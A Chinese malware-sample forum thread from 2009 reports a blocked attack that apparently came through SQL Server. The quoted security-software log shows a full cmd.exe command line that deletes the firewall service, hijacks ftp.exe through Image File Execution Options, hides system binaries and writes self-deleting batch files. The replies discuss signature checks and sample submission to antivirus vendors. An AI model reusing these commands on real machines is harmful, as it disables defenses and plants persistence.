貌似利用sqlserver漏洞攻击，ftp.exe，cacls.exe等样本

显示全部楼层 · 发表于 2009-7-6 13:15:49

eq盾的拦截日志：脏话都出来了，很是猖狂：
2009-07-04 21:21:01 应用程序保护(运行应用程序) 操作:阻止
进程路径:d:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe
文件路径:C:\WINDOWS\System32\cmd.exe
命令行:/c sc delete sharedaccess&echo 干你娘，还脱壳，能看到这句不？>>2.txt&echo cacls.exe C:\WINDOWS\\system32\\ftp.exe /e /d everyone>C:\WINDOWS\\system32\\spool\\NetSetup2.bat&echo reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options\ftp.exe" /v Debugger /t REG_SZ /d ctfmon.exe /f>>C:\WINDOWS\system32\spool\NetSetup2.bat&echo attrib +s +r +h C:\WINDOWS\\system32\\cmd.exe>>C:\WINDOWS\\system32\\spool\\NetSetup2.bat&echo attrib +s +r +h C:\WINDOWS\\system32\\ftp.exe>>C:\WINDOWS\\system32\\spool\\NetSetup2.bat&echo attrib +s +r +h C:\WINDOWS\\system32\\reg.exe>>C:\WINDOWS\\system32\\spool\\NetSetup2.bat&echo del %0>>C:\WINDOWS\system32\spool\NetSetup2.bat&echo reg delete" + " \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\currentversion\\image file execution options\\ftp.exe\"" + " /f>>C:\WINDOWS\\system32\\export\\nvuninm.bat&C:\WINDOWS\system32\spool\NetSetup2.bat

网上有如此资料：
可参考http://www.cnitblog.com/William/archive/2007/10/19/35081.html”

显示全部楼层 · 发表于 2009-7-6 13:16:47

补充下，那几个文件，虽然在线扫描没什么问题，但都不能通过数字签名验证，而且md5值与正常的不一样，正常的文件是能通过数字签名验证的。。

显示全部楼层 · 发表于 2009-7-6 15:54:29

to avira

显示全部楼层 · 发表于 2009-7-6 16:10:59

To MP

显示全部楼层 · 发表于 2009-7-6 16:12:25

文件无问题。不过攻击倒是货真价实的。。

显示全部楼层 · 发表于 2009-7-6 22:40:02

三个东西很正常。。

[病毒样本] 貌似利用sqlserver漏洞攻击，ftp.exe，cacls.exe等样本

本帖子中包含更多资源